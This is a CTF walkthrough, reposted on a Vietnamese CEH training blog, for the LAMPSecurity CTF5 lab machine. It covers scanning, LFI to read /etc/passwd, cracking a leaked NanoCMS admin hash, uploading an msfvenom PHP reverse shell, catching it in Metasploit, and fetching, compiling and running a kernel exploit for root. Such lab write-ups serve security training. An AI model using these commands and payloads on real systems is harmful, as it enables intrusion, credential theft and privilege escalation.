CEH Practice (LFI/RFI) Hack the LAMPSecurity CTF 5

Đây là một bài hướng dẫn từ HA, chúng ta chỉ quan tâm đến đoạn đầu qua video trình bày của Instructor , còn những phần sau các bạn hãy tham khảo để tìm hiểu thêm.

Chương trình đào tạo CEH v11 ANSI

Today we are going to take another CTF challenge known as LAMPSecurity CTF5 and it is another boot2root challenge provided for practice and its security level is for the beginners. So let’s try to break through it. But before please note that you can download it from here https://www.vulnhub.com/entry/lampsecurity-ctf5,84/

Penetrating Methodologies

  • Network Scanning (Nmap, netdiscover)
  • HTTP service enumeration
  • Identifying exploit for the vulnerable CMS Web application
  • Access CMS admin login page & credentials
  • Generate PHP Backdoor (Msfvenom)
  • Upload and execute the backdoor
  • Reverse connection (Metasploit)
  • Import python one-liner for proper TTY shell
  • Exploiting target (exploit 9479)
  • Get the Root access


Let’s start off with scanning the network to find our target.

We found our target –>

Our next step is to scan our target with NMAP.

nmap -sV -p-

The NMAP output shows us that there are multiple ports opened. As HTTP service is also running, let’s begin with the same first and see what information we get.

Browsed the URL and we were greeted with Phake Organization heading banner, and with many options to navigate further.

Let’s run Nikto tool here to find out more information

nikto –h

As we can see that the victim machine is prone to LFI/RFI vulnerability.

Now we will paste this malicious code (as highlighted above), in the URL as follows to exploit LFI vulnerability using the browser

As we can see from the output above, we have successfully received the output of /etc/passwd in the browser. We can use this content at some time later in the lab (if required)

Click on the Blog tab of the website and it will redirect us to the URL

We got a clue from Andy Carp’s blog that the site is powered by NanoCMS. NanoCMS is a lightweight CMS based on PHP that is now discontinued. Therefore we searched on the possible vulnerabilities associated with Nano CMS on the internet and was able to get the details from the following URL https://www.securityfocus.com/bid/34508/exploit

The possible vulnerability identified is Password Hash Information Disclosure which allows unrestricted access to the path /data/pagesdata.txt

Let’s try to append the /data/pagesdata.txt with and navigate to the URL following content will be seen which contains a lot of information. Upon further investigation we found that the Admin password hash is retrieved.

Open the website http://www.hashkiller.co.uk and decode the MD5 password hash received from above.

As seen the output “shannon” is the password extracted for the user admin.

Navigate to URL

Click on the Admin login sub-heading under the Login and we will be redirected to

Input the credentials in the Admin login page as follows :

Username: admin
Password : shannon

Upon success, the following page will appear

Click on the New page options tab where we should be able to add new content with our own PHP code.

Let’s generate a Reverse PHP shell with the following command

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw

Copy the code from <?php to die() as shown above . Open the NanoCMS Admin panel of the website, navigate to the New Page option and paste the reverse PHP shell in the Content section. Input any name in the Title and click on the Add Page.

Upon clicking on the Add page, the file “shell” has been uploaded successfully, as seen in the screenshot below (under Navigation)

Now in parallel, open the Metasploit console and perform the following

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

Once we have started the listener on the Kali Linux, click on the shell file in Andy Carp’s blog. As soon as we click the same, we will get a meterpreter console. From the below image we can observe Meterpreter session 1. But our task is not finished yet, we still need to penetrate further for the privilege escalation.

Using sysinfo command, we found machine architecture details which may eventually help us to find out the kernel exploit for privilege escalation


Searched across the internet to found the privilege escalation exploit that might apply to the Linux kernel version and found the below link (as shown in the image above).


As we know that version of the kernel is vulnerable, we will download its exploit to the Kali machine from the Exploit DB website, as shown below:

wget https://www.exploit-db.com/download/9479.c

Moving forward, we will compile the file as follows:

gcc -m32 -o exploit 9479.c

Now go back to the Meterpreter session and navigate to /tmp folder

cd /tmp

Send the exploit file from Kali machine Meterpreter session to the target system

upload /root/exploit exploit

Further, navigate to shell


In order to access proper TTY shell, we had imported python one line script by typing following:

python -c 'import pty;pty.spawn("/bin/bash")'

We got the limited shell!! Now let’s try to enumerate further

Proceed forward and go to the tmp folder by typing :

cd /tmp

Let’s see what directories it has and for that type:


Assign the permissions to the exploit, before execution

chmod 777 exploit

Then type the following command to execute the exploit:

env- ./exploit

As soon the exploit executes we will get the root access!!

And to confirm this type:


Hurray!! We have successfully solved this challenge.

Author: Ankur Sachdev is an Information Security consultant and researcher in the field of Network & WebApp Penetration Testing.

1 bình luận cho “CEH Practice (LFI/RFI) Hack the LAMPSecurity CTF 5”

  1. Ảnh đại diện Thử nghiệm thâm nhập CEHack trong PwnLab (Thử thách CTF) – Đào Tạo CEH – CHFI – ECSA – CPENT – LPT – PENTEST+ CySA+ SECURITY +

    […] Vì vậy, khi mở IP mục tiêu trên trình duyệt và khám phá tab Login thì thấy đưa ra biểu mẫu đăng nhập như hình bên dưới. Vì ta không biết về thông tin xác thực đăng nhập của nó nên thử các kỹ thuật SQL injection nhưng hiện tại không có gì hữu ích và tùy chọn cuối cùng là sử dụng CURL. Nếu bạn quan sát thấy URL thì bạn có thể tin rằng nó trông giống như bị LFI . […]


Trả lời

Bạn cần phải đăng nhập để gửi bình luận:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s

%d người thích bài này: